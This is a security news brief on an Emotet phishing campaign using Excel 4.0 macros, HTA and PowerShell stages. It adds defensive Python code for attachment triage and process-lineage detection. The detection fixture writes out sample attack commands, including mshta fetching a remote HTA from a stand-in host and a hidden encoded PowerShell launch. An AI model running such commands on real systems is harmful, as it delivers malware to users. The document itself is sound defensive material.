
Phishing Emails and Excel Macros: Emotet Cooks New Infection Recipe

The notorious Emotet is active again with new tactics to spread and deliver the malware. A new email campaign is using macro-laden Excel files and various layers of obfuscation.

The new infection tactic

Palo Alto Networks has observed that the new Emotet infection tactic uses multiple stages, involving different file types and obfuscated scripts, before delivering the payload.
  • Since December 2021, the attackers have been delivering an Excel file carrying an obfuscated Excel 4.0 macro via socially engineered emails.
  • When activated, the macro downloads and runs an HTML application (HTA), which in turn downloads two stages of PowerShell that obtain and execute the final payload.

Attack variants

According to researchers, the recent Emotet infection has several variations for spreading malicious Excel documents.
  • In some of the cases, Emotet uses a password-protected .ZIP archive attached to an email.
  • In a few other cases, it was observed using an Excel spreadsheet directly attached to the email.
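The two delivery variants above both end in a workbook carrying Excel 4.0 (XLM) macros, so a mail-gateway or sandbox triage step can look for the same two signals: ZIP entries that are password-protected (and therefore cannot be scanned), and OOXML workbooks that contain XLM macro sheets or very-hidden sheets. The following is an added example written for this brief; it is not tooling from Palo Alto Networks or Cyware. It only inspects OOXML containers (.xlsm/.xlsx), not legacy BIFF .xls files, and the sample attachment it triages is constructed in memory.

```python
"""Attachment triage: password-protected ZIP entries and XLM macro sheets in OOXML workbooks.

Added example for this brief (not the researchers' code). Legacy BIFF .xls files are
out of scope; the sample workbook and ZIP below are constructed, not real samples.
"""
import io
import re
import zipfile

# Content type that Excel assigns to an Excel 4.0 macro sheet part inside an OOXML package.
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"


def entry_flags_encrypted(flag_bits: int) -> bool:
    """Bit 0 of a ZIP entry's general-purpose flag marks traditional (password) encryption."""
    return bool(flag_bits & 0x1)


def is_encrypted_entry(info: zipfile.ZipInfo) -> bool:
    return entry_flags_encrypted(info.flag_bits)


def inspect_workbook(data: bytes) -> dict:
    """Return XLM-related indicators found in an OOXML workbook."""
    findings = {"macrosheets": [], "very_hidden_sheets": [], "has_xlm": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # XLM macros live in dedicated macro sheet parts.
        findings["macrosheets"] = [n for n in names if n.startswith("xl/macrosheets/")]
        if "[Content_Types].xml" in names:
            ct = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            if MACROSHEET_CT in ct:
                findings["has_xlm"] = True
        if "xl/workbook.xml" in names:
            wb = zf.read("xl/workbook.xml").decode("utf-8", "replace")
            # state="veryHidden" sheets cannot be unhidden from the Excel UI; a common place to park macros.
            for m in re.finditer(r'<sheet\b[^>]*\bname="([^"]*)"[^>]*\bstate="veryHidden"', wb):
                findings["very_hidden_sheets"].append(m.group(1))
    findings["has_xlm"] = findings["has_xlm"] or bool(findings["macrosheets"])
    return findings


def triage_zip_attachment(data: bytes) -> dict:
    """Summarise a ZIP attachment: encrypted entries and indicators in any workbooks inside."""
    report = {"encrypted_entries": [], "workbooks": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if is_encrypted_entry(info):
                # Cannot be opened without the password from the email body: flag it and move on.
                report["encrypted_entries"].append(info.filename)
                continue
            if info.filename.lower().endswith((".xlsm", ".xlsx", ".xlsb")):
                report["workbooks"][info.filename] = inspect_workbook(zf.read(info.filename))
    return report


def build_sample_workbook() -> bytes:
    """Constructed minimal OOXML workbook: one visible sheet plus one veryHidden XLM macro sheet."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "[Content_Types].xml",
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="%s"/></Types>' % MACROSHEET_CT,
        )
        zf.writestr(
            "xl/workbook.xml",
            '<workbook><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
            '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets></workbook>',
        )
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        zf.writestr("xl/macrosheets/sheet1.xml", "<macrosheet/>")
    return buf.getvalue()


def build_sample_attachment() -> bytes:
    """Constructed ZIP attachment wrapping the sample workbook (left unencrypted so it can be opened)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.xlsm", build_sample_workbook())
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip_attachment(build_sample_attachment()))
```

An encrypted entry cannot be inspected at all without the password, which is exactly why the lure ships it in the email body; a gateway policy that quarantines or detonates password-protected archives closes that gap, and the workbook checks catch the direct-attachment variant.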

Additional details

For this campaign, attackers have used email thread hijacking and some other attack tactics.
  • An email sent by the Emotet botnet on January 27 used a stolen email thread from June 2021.
  • In this case, the email used a lure that included an encrypted .ZIP file to avoid security systems or solutions, and a password to the .ZIP file for the victim to extract the contents.
  • The encrypted .ZIP file contained a single Excel document laden with Excel 4.0 macros.
  • Once the macro is executed, a remote HTML app is run to download and execute additional PowerShell code. The code retrieves second-stage PowerShell code to obtain the Emotet binary.
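The chain described above (Excel macro, then a remote HTA, then two stages of PowerShell) is visible on the endpoint as a process lineage: an Office process spawning mshta.exe, which spawns powershell.exe. The following detection sketch is an added example written for this brief, not code from Palo Alto Networks or Cyware. It runs over a constructed set of process-creation events whose field names loosely mirror Sysmon Event ID 1 (pid, parent pid, image, command line); the values are invented.

```python
"""Flag Office -> script host -> PowerShell process lineages in process-creation events.

Added example for this brief (not the researchers' code). EVENTS is a constructed
sample: one Excel session that matches the described chain and one benign one.
"""
from collections import defaultdict

EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "cmd": '"EXCEL.EXE" invoice.xls'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe", "cmd": "mshta.exe http://example.invalid/page.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe -w hidden -enc <constructed>"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe -nop -c <constructed>"},
    {"pid": 600, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "cmd": '"EXCEL.EXE" budget.xlsx'},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\splwow64.exe", "cmd": "splwow64.exe 12288"},
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def build_tree(events):
    """Index events by pid and map each pid to its child pids."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def leaf_paths(children, root):
    """Yield every root-to-leaf pid path below root (root included)."""
    stack = [[root]]
    while stack:
        path = stack.pop()
        kids = children.get(path[-1], [])
        if not kids:
            yield path
        for k in kids:
            stack.append(path + [k])


def matches_chain(images):
    """True when, after the Office process, a script host appears and PowerShell follows it."""
    seen_host = False
    for img in images[1:]:
        if img in SCRIPT_HOSTS:
            seen_host = True
        elif seen_host and img in POWERSHELL:
            return True
    return False


def find_office_script_chains(events):
    """Return each Office-rooted lineage that matches the HTA -> PowerShell pattern."""
    by_pid, children = build_tree(events)
    hits = []
    for e in events:
        if basename(e["image"]) not in OFFICE:
            continue
        for path in leaf_paths(children, e["pid"]):
            images = [basename(by_pid[p]["image"]) for p in path]
            if matches_chain(images):
                hits.append({"pids": path, "images": images})
    return hits


if __name__ == "__main__":
    for hit in find_office_script_chains(EVENTS):
        print(" -> ".join(hit["images"]), hit["pids"])
```

Matching on the whole lineage rather than on a single parent-child pair keeps the benign Excel session (which only spawns the print helper) out of the results while still catching the second PowerShell stage, which inherits the suspicious ancestry even though its direct parent is just another powershell.exe.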

The bottom line

Emotet is a prominent threat, known for regularly updating its infection and delivery tactics to avoid security solutions. Frequent updates in its delivery and evasion tactics indicate that its operators are investing ample time and resources to improve its effectiveness against security defenses.
Cyware Publisher
